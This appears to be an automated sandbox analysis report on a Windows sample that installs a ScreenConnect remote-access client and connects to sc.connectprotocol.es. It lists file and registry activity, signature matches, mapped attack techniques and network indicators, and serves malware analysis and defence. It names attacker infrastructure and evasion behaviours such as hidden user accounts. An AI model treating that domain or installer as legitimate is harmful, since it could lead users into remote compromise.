Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_00B34C62 RtlGetVersion,7_2_00B34C62
Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\msiexec.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
Source: Yara match | File source: f53WqfzzNt.exe, type: SAMPLE
Source: Yara match | File source: 0.2.f53WqfzzNt.exe.5a90000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.ScreenConnect.WindowsClient.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.ScreenConnect.WindowsClient.exe.316fa10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.f53WqfzzNt.exe.5a90000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ScreenConnect.WindowsClient.exe.23bfa50.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.f53WqfzzNt.exe.fd5db0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.f53WqfzzNt.exe.fac3d4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.f53WqfzzNt.exe.f263d4.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.f53WqfzzNt.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1747609157.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: f53WqfzzNt.exe PID: 7480, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7680, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8116, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\Temp\~DFCC421647BED1434B.TMP, type: DROPPED
Source: Yara match | File source: C:\Windows\Temp\~DFCD8E0A85204A1AE0.TMP, type: DROPPED
Source: Yara match | File source: C:\Windows\Temp\~DFE92FC617A28FB7B7.TMP, type: DROPPED
Source: Yara match | File source: C:\Windows\Temp\~DF8EE2806658991912.TMP, type: DROPPED
Source: Yara match | File source: C:\Windows\Temp\~DF61A468A6AB3D1920.TMP, type: DROPPED
Source: Yara match | File source: C:\Windows\Temp\~DFFEA70B09147D26F1.TMP, type: DROPPED
Source: Yara match | File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
Source: Yara match | File source: C:\Config.Msi\4ec960.rbs, type: DROPPED
Source: Yara match | File source: C:\Windows\Installer\MSICBE0.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, type: DROPPED
MITRE ATT&CK matrix, listed per tactic column (a number in front of a technique is the count shown next to it in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations; Business Relationships; Identify Business Tempo

Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet

Initial Access: 1 Valid Accounts; 1 Replication Through Removable Media; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain; Trusted Relationship; Hardware Additions

Execution: 31 Windows Management Instrumentation; 1 Native API; 12 Command and Scripting Interpreter; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell; Visual Basic; Python

Persistence: 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 1 Component Object Model Hijacking; 1 Valid Accounts; 2 Windows Service; 1 Bootkit; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Hypervisor

Privilege Escalation: 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 1 Component Object Model Hijacking; 1 Valid Accounts; 1 Access Token Manipulation; 2 Windows Service; 12 Process Injection; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Process Injection

Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 DLL Search Order Hijacking; 1 File Deletion; 122 Masquerading; 1 Valid Accounts; 1 Access Token Manipulation; 61 Virtualization/Sandbox Evasion; 12 Process Injection; 1 Hidden Users; 1 Bootkit; 1 Rundll32

Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking

Discovery: 11 Peripheral Device Discovery; 1 File and Directory Discovery; 55 System Information Discovery; 31 Security Software Discovery; 2 Process Discovery; 61 Virtualization/Sandbox Evasion; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery; Local Groups; Domain Groups

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM; Exploitation of Remote Services

Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection; Local Email Collection; Remote Email Collection

Command and Control: 2 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy; Internal Proxy; External Proxy

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB; Commonly Used Port; Transfer Data to Cloud Account

Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service; Direct Network Flood; Reflection Amplification
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet
Behavior Graph ID: 1567469 | Sample: f53WqfzzNt.exe | Startdate: 03/12/2024 | Architecture: WINDOWS | Score: 46

Start
  DNS/IP: sc.connectprotocol.es
  Signatures: Multi AV Scanner detection for submitted file; .NET source code contains potential unpacker; .NET source code references suspicious native API functions; 4 other signatures
  Started:
  • msiexec.exe (93 49)
      Dropped: ScreenConnect.Wind...dentialProvider.dll, PE32+; C:\...\ScreenConnect.WindowsClient.exe, PE32; C:\...\ScreenConnect.ClientService.exe, PE32; 10 other files (1 malicious)
      Signatures: Enables network access during safeboot for specific services; Modifies security policies related information
      Started:
      • msiexec.exe
          Started:
          • rundll32.exe
              Dropped: C:\Users\user\...\ScreenConnect.Windows.dll, PE32; C:\...\ScreenConnect.InstallerActions.dll, PE32; C:\Users\user\...\ScreenConnect.Core.dll, PE32; 4 other files (none is malicious)
              Signatures: Contains functionality to hide user accounts
      • msiexec.exe (1)
      • msiexec.exe
  • ScreenConnect.ClientService.exe (2 5)
      DNS/IP: sc.connectprotocol.es 38.69.12.167, 49731, 8041 54583US United States
      Signatures: Reads the Security eventlog; Reads the System eventlog
      Started:
      • ScreenConnect.WindowsClient.exe
          Signatures: Creates files in the system32 config directory; Contains functionality to hide user accounts
      • ScreenConnect.WindowsClient.exe (2)
  • f53WqfzzNt.exe (6)
      Dropped: C:\Users\user\AppData\...\f53WqfzzNt.exe.log, ASCII
      Signatures: Contains functionality to hide user accounts
      Started:
      • msiexec.exe (6)
          Dropped: C:\Users\user\AppData\Local\...\MSIC2F6.tmp, PE32
  • svchost.exe (1 1)
      DNS/IP: 127.0.0.1 unknown unknown



Initial sample:
Source | Detection | Scanner | Label
f53WqfzzNt.exe | 26% | ReversingLabs | Win32.Trojan.Generic

Dropped files:
Source | Detection | Scanner | Label
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs |
C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Core.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs |
C:\Windows\Installer\MSICBF0.tmp | 0% | ReversingLabs |
C:\Windows\Installer\MSICFCA.tmp | 0% | ReversingLabs |
                                  No Antivirus matches
                                  No Antivirus matches
                                  No Antivirus matches
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sc.connectprotocol.es | 38.69.12.167 | true | false | | high
URLs (as extracted from process memory and dropped files; trailing stray characters on some URLs are extraction residue from the memory strings):
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v | rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | high
https://docs.rs/getrandom#nodejs-es-module-support | ScreenConnect.WindowsCredentialProvider.dll.2.dr | false | | high
http://crl.ver) | svchost.exe, 00000009.00000002.3446163571.000001859C093000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.tiro.com | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.9.dr, qmgr.db.9.dr | false | | high
http://www.fontbureau.com/designers | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://wixtoolset.org/news/ | rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | high
http://www.goodfont.co.kr | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.carterandcone.coml | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sajatypeworks.com | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.typography.netD | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod.C: | edb.log.9.dr, qmgr.db.9.dr | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/staff/dennis.htm | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://wixtoolset.org/releases/ | rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.dr | false | | high
http://www.founder.com.cn/cn | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/frere-user.html | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2 | edb.log.9.dr, qmgr.db.9.dr | false | | high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000009.00000003.1801728222.000001859BF12000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr | false | | high
http://www.jiyu-kobo.co.jp/ | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://feedback.screenconnect.com/Feedback.axd | ScreenConnect.Core.dll.2.dr | false | | high
http://www.galapagosdesign.com/DPlease | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers8 | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.urwpp.deDPlease | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.zhongyicts.com.cn | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | f53WqfzzNt.exe, 00000000.00000002.1727538810.0000000003151000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3577508560.0000000001719000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000009.00000003.1801728222.000001859BF12000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr | false | | high
Contacted public IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
38.69.12.167 | sc.connectprotocol.es | United States | 54583 | 54583US | false
Private IPs:
IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567469
Start date and time: 2024-12-03 16:22:31 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: f53WqfzzNt.exe (renamed because the original name is a hash value)
Original Sample Name: 5fe1ed17626c02fd6b85cc7e02d20e7f68271ca1dff97855785cf58b9b0d0e57.exe
Detection: MAL
Classification: mal46.evad.winEXE@18/59@1/2
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 60%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 65%
                                                                                                              • Number of executed functions: 187
                                                                                                              • Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target f53WqfzzNt.exe, PID 7480 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 7680 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtSetInformationFile calls found
